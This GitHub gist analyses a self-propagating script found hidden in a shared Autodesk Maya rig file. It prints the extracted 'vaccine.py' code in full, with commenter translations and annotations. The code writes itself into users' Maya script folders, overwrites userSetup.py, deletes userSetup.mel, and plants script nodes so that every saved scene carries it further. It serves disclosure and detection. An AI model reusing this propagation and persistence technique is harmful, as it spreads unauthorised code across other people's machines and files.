@mottosso
Last active October 31, 2023 18:14
Hidden scriptJob with "virus" and "vaccine" keywords from CG Monastery

This is a scene file shared by user @roly on the CG Monastery Discord. It contains an embedded script that installs itself automatically and runs on every scene save (the SceneSaved event). The script was found in the rig, bat_rig_04.mb, rather than in the animation file, TURN_ani_bat_23.ma. Find the imported scene file below (5340 kb).

What happens?

  • Installs itself on scene-open, as a cmds.scriptJob
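  • Installs itself on Maya open, as ~/maya/scripts/vaccine.py. The listing below also writes a scripts/userSetup.py that imports vaccine at startup; the file is opened for writing, so an existing userSetup.py is overwritten.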
  • Shows a warning on every scene save, with the following message

image

Suspicious words

  • virus
  • antivirus
  • vaccine

Suspicious calls

Calls that don't belong in any rig or animation file.

  • os.makedirs
  • os.remove
  • os.path.exists
  • shutil.copyfile
  • cmds.internalVar

Full Script Job

The following script is obfuscated and hidden inside the binary .mb file.

# coding=utf-8
# @Time    : 2020/07/05 15:46
# @Author  : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File    : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil


# NOTE(review): the indentation in this listing is inconsistent (3-, 4-, 7-,
# 8-space levels are mixed), so it does not run as pasted. The code is kept
# exactly as found; the comments only describe what each part does.
#
# Names a defender can search for, all taken from the code below:
#   - script nodes named 'vaccine_gene' and 'breed_gene' in a scene
#   - <userAppDir>/scripts/vaccine.py on disk
#   - a scriptJob whose command string is "leukocyte.antivirus()"
# The code also deletes <userAppDir>/scripts/userSetup.mel when it exists.
class phage:
    # Copy the scene at `path` into a 'history' folder beside it, creating the
    # folder when it is missing. The path is split on '/' only.
    @staticmethod
    def backup(path):
        folder_path = path.rsplit('/', 1)[0]
        file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
        backup_folder = folder_path + '/history'
        # The literal ends with a space ('_backup.ma '), so the copy's name has
        # a trailing space. The extension is always .ma, whatever the source
        # file's extension was; copyfile copies the bytes unchanged.
        new_file = backup_folder + '/' + file_name + '_backup.ma '
        if not os.path.exists(backup_folder):
           os.makedirs(backup_folder)
       shutil.copyfile(path, new_file)

   # Entry point run by the SceneSaved scriptJob that occupation() registers.
   def antivirus(self):
       health = True
       # Before any scanning: re-create the two script nodes in the current
       # scene, then delete scripts/userSetup.mel if present.
       self.clone_gene()
       self.antivirus_virus_base()
        # Marker substrings this script treats as signs of other malware.
        virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
        all_script_jobs = cmds.scriptJob(listJobs=True)
       # The text before the first ':' of each listed job is taken as the job
       # number; a job containing any marker is killed with force=True.
       for each_job in all_script_jobs:
           for each_gene in virus_gene:
               if each_gene in each_job:
                   health = False
                   job_num = int(each_job.split(':', 1)[0])
                   cmds.scriptJob(kill=job_num, force=True)
        # Script nodes: read each node's 'before' attribute and delete the node
        # when it contains a marker. This loop never sets health = False, so the
        # backup-and-save branch below runs only when a scriptJob matched.
        all_script = cmds.ls(type='script')
        if all_script:
           for each_script in all_script:
                commecnt = cmds.getAttr(each_script + '.before')
                for each_gene in virus_gene:
                   if commecnt:
                       if each_gene in commecnt:
                           try:
                               cmds.delete(each_script)
                           # Bare except: any failure of cmds.delete ends up here.
                           except:
                                name_space = each_script.rsplit(':',1)[0]
                                # Message (escaped UTF-8): "{} is infected, but I can't delete it".
                                # NOTE(review): cmds.error raises in Python, so
                                # presumably the rest of this call is skipped.
                                cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
        if not health:
           # A marker scriptJob was found: copy the scene to history/, save the
           # scene without asking the user, then report through cmds.error.
           file_path = cmds.file(query=True, sceneName=True)
           self.backup(file_path)
           cmds.file(save=True)
           # Message: "Your file is infected, but I thoughtfully disinfected it
           # and backed it up for you ~ You're welcome ~"
           cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
        else:
            # Message: "Your file is very healthy~ I just said it, I don't mean
            # anything else." This is the warning users see on every save.
            cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')

   # Delete <userAppDir>/scripts/userSetup.mel whenever it exists. The file's
   # content is never inspected, so a legitimate userSetup.mel is removed too.
   @staticmethod
   def antivirus_virus_base():
        virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
        if os.path.exists(virus_base):
           try:
               os.remove(virus_base)
           # Bare except: every failure is reported with the same message.
           except:
                # Message: the Chinese text reads roughly "virus removal failed".
                cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')

   # Plant two script nodes in the current scene so that the scene carries a
   # copy of vaccine.py and re-installs it where it is opened.
   def clone_gene(self):
        vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
        # 'vaccine_gene' is created only when vaccine.py is already on disk; its
        # lines are read so they can be stored on the node below.
        if not cmds.objExists('vaccine_gene'):
            if os.path.exists(vaccine_path):
               gene = list()
               with open(vaccine_path, "r") as f:
                   for line in f.readlines():
                       gene.append(line)
                # NOTE(review): the string assigned here is never used in this
                # listing, and `bs` passed to scriptNode below is not defined
                # anywhere in it. The text also references petri_dish_path
                # without defining it and has an unquoted /scripts, so this
                # part looks like a lossy rendering. The second listing on this
                # page passes the script inline as bs="...".
                npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
    sys.path.append(maya_path)

import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())

with open(petri_dish_path, "w") as f:
    f.writelines(petri_dish_gene)
"""

                # st is scriptType and bs is beforeScript; the page describes
                # st=1 nodes as running on scene-open. stp='python' marks the
                # script as Python.
                cmds.scriptNode(st=1,
                                n='vaccine_gene', stp='python',
                                bs=bs)
                # The lines of vaccine.py are stored in a 'notes' string
                # attribute on the node, i.e. inside the scene file itself.
                # NOTE(review): `gene` is a list passed with type='string';
                # presumably stored in its text form, since the breed_gene
                # script eval()s it - confirm.
                cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
                cmds.setAttr('vaccine_gene.notes', gene, type='string')
        # 'breed_gene' carries the installer: when vaccine.py is missing and
        # the scene has a vaccine_gene node, it eval()s vaccine_gene.notes and
        # writes the result to <userAppDir>/scripts/vaccine.py.
        # Risk: the eval() input is an attribute stored in the scene file, so
        # whoever edits the scene decides what is evaluated.
        # NOTE(review): in this rendering the embedded script has lost its
        # quotes and part of its indentation.
        if not cmds.objExists('breed_gene'):
            cmds.scriptNode(st=1,
                            n='breed_gene',
                            stp='python',
                            bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
    if cmds.objExists(vaccine_gene):
        gene = eval(cmds.getAttr(vaccine_gene.notes))
        with open(vaccine_path, "w") as f:
        f.writelines(gene)
""")

   # Register antivirus() to run on every SceneSaved event. The command is the
   # string "leukocyte.antivirus()", so it depends on a global `leukocyte`
   # existing when the event fires. protected=True means the job is killed only
   # when the caller passes force=True.
   def occupation(self):
       cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : 顶天立地智慧大将军
# @File : vaccine.py
# 仅作为公司内部使用保护 一旦泄露出去造成的影响 本人概不负责
import maya.cmds as cmds
import os
import shutil
# NOTE(review): all indentation was lost in this rendering, so it does not run
# as pasted. The code is kept exactly as found; the comments only describe
# what each part does.
#
# Names a defender can search for, all taken from the code below:
#   - script nodes named 'vaccine_gene' and 'breed_gene' in a scene
#   - scripts/vaccine.py and scripts/userSetup.py under Maya's userAppDir
#   - a scriptJob whose command string is "leukocyte.antivirus()"
# The code also deletes <userAppDir>/scripts/userSetup.mel when it exists.
class phage:
# backup: copy the scene at `path` into a 'history' folder beside it, creating
# the folder when it is missing. The path is split on '/' only.
@staticmethod
def backup(path):
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
# The literal ends with a space ('_backup.ma '), so the copy's name has a
# trailing space. The extension is always .ma, whatever the source file was.
new_file = backup_folder + '/' + file_name + '_backup.ma '
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
# antivirus: entry point run by the SceneSaved scriptJob from occupation().
def antivirus(self):
health = True
# Before any scanning: re-create the two script nodes in the current scene,
# then delete scripts/userSetup.mel if present.
self.clone_gene()
self.antivirus_virus_base()
# Marker substrings this script treats as signs of other malware.
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
# The text before the first ':' of each listed job is taken as the job number;
# a job containing any marker is killed with force=True.
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
health = False
job_num = int(each_job.split(':', 1)[0])
cmds.scriptJob(kill=job_num, force=True)
# Script nodes: read each node's 'before' attribute and delete the node when it
# contains a marker. health is not changed here, so the backup-and-save branch
# below runs only when a scriptJob matched.
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
try:
cmds.delete(each_script)
# Bare except: any failure of cmds.delete ends up here.
except:
name_space = each_script.rsplit(':',1)[0]
# Message: "{} is infected, but I can't delete it".
# NOTE(review): cmds.error raises in Python, so presumably the rest of this
# call is skipped.
cmds.error(u'{}被感染了,但是我没法删除'.format(name_space))
if not health:
# A marker scriptJob was found: copy the scene to history/, save the scene
# without asking the user, then report through cmds.error.
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
# Message: "Your file is infected, but I thoughtfully disinfected it and
# backed it up for you ~ You're welcome ~"
cmds.error(u'你的文件被感染了,但是我贴心的为您杀毒并且备份了~不用谢~')
else:
# Message: "Your file is very healthy~ I just said it, I don't mean anything
# else." This is the warning users see on every save.
cmds.warning(u'你的文件贼健康~我就说一声没有别的意思')
# antivirus_virus_base: delete <userAppDir>/scripts/userSetup.mel whenever it
# exists. The content is never inspected, so a legitimate file is removed too.
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
# Bare except: every failure is reported with the same message.
except:
# Message: roughly "virus removal failed".
cmds.error(u'杀毒失败')
# clone_gene: plant two script nodes in the current scene so that the scene
# carries a copy of vaccine.py and re-installs it where it is opened.
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
# 'vaccine_gene' is created only when vaccine.py is already on disk; its lines
# are read so they can be stored on the node below.
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
# st is scriptType and bs is beforeScript; the page describes st=1 nodes as
# running on scene-open. The embedded script opens
# <userAppDir>scripts/userSetup.py with mode "w", which replaces any existing
# userSetup.py, and writes lines that add the scripts folder to sys.path,
# import vaccine, and defer `leukocyte = vaccine.phage()` followed by
# `leukocyte.occupation()`. That is what makes the scriptJob return on every
# Maya start.
cmds.scriptNode(st=1,
bs="petri_dish_path = cmds.internalVar(userAppDir=True) + 'scripts/userSetup.py'\npetri_dish_gene = ['import sys\\r\\n', 'import maya.cmds as cmds\\r\\n', \"maya_path = cmds.internalVar(userAppDir=True) + '/scripts'\\r\\n\", 'if maya_path not in sys.path:\\r\\n', ' sys.path.append(maya_path)\\r\\n', 'import vaccine\\r\\n', \"cmds.evalDeferred('leukocyte = vaccine.phage()')\\r\\n\", \"cmds.evalDeferred('leukocyte.occupation()')\"]\nwith open(petri_dish_path, \"w\") as f:\n\tf.writelines(petri_dish_gene)",
n='vaccine_gene', stp='python')
# The lines of vaccine.py are stored in a 'notes' string attribute on the node,
# i.e. inside the scene file itself.
# NOTE(review): `gene` is a list passed with type='string'; presumably stored
# in its text form, since the breed_gene script eval()s it - confirm.
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
# 'breed_gene' carries the installer: when vaccine.py is missing and the scene
# has a vaccine_gene node, it eval()s vaccine_gene.notes and writes the result
# to <userAppDir>/scripts/vaccine.py.
# Risk: the eval() input is an attribute stored in the scene file, so whoever
# edits the scene decides what is evaluated.
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
bs="import os\nvaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'\nif not os.path.exists(vaccine_path):\n\tif cmds.objExists('vaccine_gene'):\n\t\tgene = eval(cmds.getAttr('vaccine_gene.notes'))\n\t\twith open(vaccine_path, \"w\") as f:\n\t\t\tf.writelines(gene)",
n='breed_gene', stp='python')
# occupation: register antivirus() to run on every SceneSaved event. The
# command is the string "leukocyte.antivirus()", so it depends on the global
# `leukocyte` that the generated userSetup.py creates. protected=True means the
# job is killed only when the caller passes force=True.
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
binary1230 commented Oct 31, 2023

just came across this randomly, here's a few strings in that file translated into English.

Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.

Author: "The indomitable and wise general"
"This is only for internal use of the company. I will not be responsible for the impact if it is leaked."

^ Hilarious. There must be a story behind this.

"Your file is infected, but I thoughtfully disinfected it and backed it up for you ~ You're welcome ~"
vs
"Your file is very healthy~ I just said it, I don’t mean anything else."
vs
"It's infected but I can't delete it"
